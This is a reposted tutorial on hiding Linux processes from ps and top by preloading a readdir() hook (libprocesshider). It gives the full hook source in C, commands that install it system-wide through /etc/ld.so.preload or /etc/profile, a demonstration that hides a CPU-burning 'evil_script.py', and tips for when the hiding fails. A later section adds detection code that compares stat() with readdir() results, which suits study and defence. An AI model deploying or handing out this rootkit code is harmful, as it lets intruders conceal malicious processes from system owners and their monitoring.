
A method of hiding processes under linux and the pits encountered

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

Preface

1. The tool used in this article can be downloaded from https://github.com/gianlucaborello/libprocesshider

2. The idea is to use LD_PRELOAD to hijack a libc function.

What LD_PRELOAD is:

LD_PRELOAD is an environment variable honoured by the Linux dynamic linker (ld.so). It names shared objects that are loaded before every other library when a dynamically linked program starts, so a symbol defined in a preloaded object takes precedence over the same symbol in libc or in any other library the program links against. The legitimate use is to swap in a replacement implementation of a function without having the program's source code or rebuilding it; the offensive use is to inject code into someone else's process and override the functions it calls. Two properties matter for what follows: the mechanism only affects dynamically linked programs (a statically linked binary never consults ld.so), and in secure-execution mode, i.e. for set-user-ID and set-group-ID executables, the dynamic linker largely ignores the variable (preload paths containing a slash are dropped). The system-wide equivalent is the file /etc/ld.so.preload, which ld.so reads for every dynamically linked program without any environment variable being set.

Implementation

1. Download and compile the program

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2. Move the library to the /usr/local/lib/ directory

mv libprocesshider.so /usr/local/lib/

3. Register it in the global preload list of the dynamic linker (the path is appended to the file, one object per line)

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

Test

1. Run evil_script.py (a script that burns CPU in a loop).

2. evil_script.py now appears in neither top nor ps.

The CPU is at 100%, yet no process can be found that accounts for the load.

Analysis

The library is a single C file, processhider.c. It hooks readdir() and readdir64(), and whenever the directory being read is /proc it drops the entry whose process name matches the configured string (the literal "readdir" string inside the macro on the original page is a transcription error: the macro stringifies its argument so that the readdir64 hook resolves the real readdir64, and the readlink() call is bounded so the terminating byte cannot be written past the buffer):

#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";

/*
 * Get a directory name given a DIR* handle, by resolving
 * /proc/self/fd/<fd> back to the path the handle refers to
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if (fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    /* leave room for the terminator: readlink() does not add one */
    ssize_t ret = readlink(tmp, buf, size - 1);
    if (ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid, from the comm field of /proc/<pid>/stat
 */
static int get_process_name(char* pid, char* buf)
{
    /* only purely numeric entries of /proc are pids */
    if (strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

    FILE* f = fopen(tmp, "r");
    if (f == NULL) {
        return 0;
    }

    if (fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    /* stat line looks like: "1234 (evil_script.py) R 1 ..." */
    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}

/*
 * Define a replacement for one readdir variant. The original function is
 * looked up lazily with dlsym(RTLD_NEXT, ...), i.e. the next definition
 * after this preloaded library, which is the real one in libc.
 */
#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if (original_##readdir == NULL) {                                   \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);                \
        if (original_##readdir == NULL)                                 \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while (1)                                                           \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if (dir) {                                                      \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if (get_dir_name(dirp, dir_name, sizeof(dir_name)) &&       \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;  /* skip this entry, fetch the next one */    \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1. The program defines a variable, process_to_filter, that controls which process name is not displayed.

2. It redefines readdir (and readdir64). Because the preloaded library comes first in symbol resolution, ps, top, ls and every other dynamically linked program that enumerates /proc calls this version instead of libc's.

strcmp(process_name, process_to_filter) == 0

When the name of the entry currently being returned equals process_to_filter, the loop continues, i.e. the entry is skipped and the caller receives the next one. Note what is compared: the comm field of /proc/<pid>/stat, which the kernel sets to the basename of the executed file truncated to 15 bytes. A script started through its shebang line therefore has comm "evil_script.py" and is hidden, while the same script started as "python evil_script.py" has comm "python" and is not.
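The two facts above, that the hook only alters what readdir() returns for /proc and that it matches on the kernel's 15-byte comm field, are exactly what a defender uses to find such a process. The following is an added example, not code from the original article or from the libprocesshider project. It asks the kernel about every possible pid with stat("/proc/<pid>"), which no readdir hook intercepts, and reports any pid that stat() confirms but a readdir() walk of /proc never returns; it also parses the comm field the robust way (last ')' rather than first, since comm may itself contain ')') and predicts the comm the kernel records for a given path. All function names are the example's own; it assumes Linux with /proc mounted.

```c
/* Added example: detect processes hidden from readdir() by a preload hook
 * such as libprocesshider.  Not part of the original article or project.
 * Assumes Linux with /proc mounted.  Function names are the example's own. */
#define _GNU_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define TASK_COMM_LEN 16   /* kernel limit: comm is at most 15 bytes plus NUL */

/* Extract comm from a /proc/<pid>/stat line.  The hook's sscanf("%d (%[^)]s")
 * stops at the first ')'; comm can contain ')' or spaces, so scan for the
 * LAST ')' instead.  Returns 1 on success, 0 if the line is malformed. */
int parse_stat_comm(const char *line, char *out, size_t outsz)
{
    const char *open = strchr(line, '(');
    const char *close = strrchr(line, ')');
    if (!open || !close || close <= open || outsz == 0) return 0;
    size_t len = (size_t)(close - open - 1);
    if (len >= outsz) len = outsz - 1;
    memcpy(out, open + 1, len);
    out[len] = '\0';
    return 1;
}

/* The comm the kernel records for a program or shebang script executed from
 * this path: the basename, truncated to TASK_COMM_LEN - 1 bytes. */
void expected_comm(const char *path, char *out, size_t outsz)
{
    const char *base = strrchr(path, '/');
    base = base ? base + 1 : path;
    snprintf(out, outsz < TASK_COMM_LEN ? outsz : TASK_COMM_LEN, "%s", base);
}

/* Does a readdir() walk of /proc list this pid?  (the hookable view) */
int pid_listed_by_readdir(pid_t pid)
{
    char want[32];
    snprintf(want, sizeof want, "%d", (int)pid);
    DIR *d = opendir("/proc");
    if (!d) return 0;
    int found = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, want) == 0) { found = 1; break; }
    closedir(d);
    return found;
}

/* Does the kernel know this pid?  stat() does not go through readdir(),
 * so a readdir-only hook cannot influence the answer. */
int pid_visible_via_stat(pid_t pid)
{
    char path[64];
    struct stat st;
    snprintf(path, sizeof path, "/proc/%d", (int)pid);
    return stat(path, &st) == 0;
}

static int read_pid_max(void)
{
    int v = 32768;   /* conservative fallback if the sysctl is unreadable */
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%d", &v) != 1) v = 32768; fclose(f); }
    return v;
}

/* Fill out[] (at most max entries) with pids in [lo, hi] that stat() confirms
 * but readdir() omits.  A miss is re-checked with a fresh readdir() pass so a
 * process that merely started mid-scan is not reported.  Returns the count,
 * or -1 on error. */
int find_hidden_pids(pid_t lo, pid_t hi, pid_t *out, int max)
{
    int pid_max = read_pid_max();
    if (hi > pid_max) hi = (pid_t)pid_max;
    unsigned char *seen = calloc((size_t)pid_max / 8 + 1, 1);
    if (!seen) return -1;

    /* pass 1: the (possibly hooked) readdir() view, as a bitmap of pids */
    DIR *d = opendir("/proc");
    if (!d) { free(seen); return -1; }
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(e->d_name, &end, 10);
        if (*end == '\0' && pid > 0 && pid <= pid_max)
            seen[pid / 8] |= (unsigned char)(1u << (pid % 8));
    }
    closedir(d);

    /* pass 2: ask the kernel directly, pid by pid */
    int n = 0;
    for (pid_t pid = lo; pid <= hi && n < max; pid++) {
        if (!pid_visible_via_stat(pid)) continue;
        if (seen[pid / 8] & (1u << (pid % 8))) continue;
        if (pid_listed_by_readdir(pid)) continue;   /* started mid-scan */
        out[n++] = pid;
    }
    free(seen);
    return n;
}

int main(void)
{
    pid_t hidden[64];
    int n = find_hidden_pids(1, (pid_t)read_pid_max(), hidden, 64);
    if (n < 0) { perror("scan"); return 1; }
    for (int i = 0; i < n; i++) {
        char path[64], line[512], comm[TASK_COMM_LEN] = "";
        snprintf(path, sizeof path, "/proc/%d/stat", (int)hidden[i]);
        FILE *f = fopen(path, "r");
        if (f) {
            if (fgets(line, sizeof line, f)) parse_stat_comm(line, comm, sizeof comm);
            fclose(f);
        }
        printf("hidden from readdir: pid %d comm \"%s\"\n", (int)hidden[i], comm);
    }
    printf("%d hidden pid(s)\n", n);
    return 0;
}
```

Run it as a dynamically linked binary on the host where the preload is active: the scanner's own readdir() is hooked too, which is the point, so any pid the hook swallows shows up in the stat() pass. The same cross-check can be done without code by comparing the output of a statically linked ps or ls (for example from busybox) with the dynamic one, and by reading /etc/ld.so.preload, which the hook makes no attempt to conceal.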

Pitfalls encountered

1. On some Linux systems the program does not compile.

Solution

Delete one of the last two lines:

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

Be aware that on platforms where readdir and readdir64 are distinct symbols, dropping one of them leaves programs that call the other variant unfiltered.

2. On some Linux systems

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

does not take effect. In that case set the environment variable instead: edit /etc/profile (bmfxgkpt-yhd:~# vi /etc/profile) and add the line

export LD_PRELOAD=/usr/local/lib/libprocesshider.so

Two caveats with this fallback. /etc/profile is only read by login shells, so the variable reaches processes started from such a shell and nothing else; daemons, cron jobs and anything that sanitises its environment still enumerate /proc with the real readdir and see the process. And whichever method is used, a quick check that the preload is actually applied is to run ldd /bin/ls and confirm that /usr/local/lib/libprocesshider.so is listed.

Summary

The above is a method of hiding a process under Linux, together with the pitfalls encountered along the way. The hook changes exactly one thing, the entries returned by readdir() on /proc to dynamically linked programs; /etc/ld.so.preload itself, the library file under /usr/local/lib, a stat() of /proc/<pid>, and any statically linked tool all still reveal the process. I hope this is helpful; if you have any questions, leave a message and I will reply in time. Thank you for your support of the site.


© 2024 shulou.com SLNews company. All rights reserved.
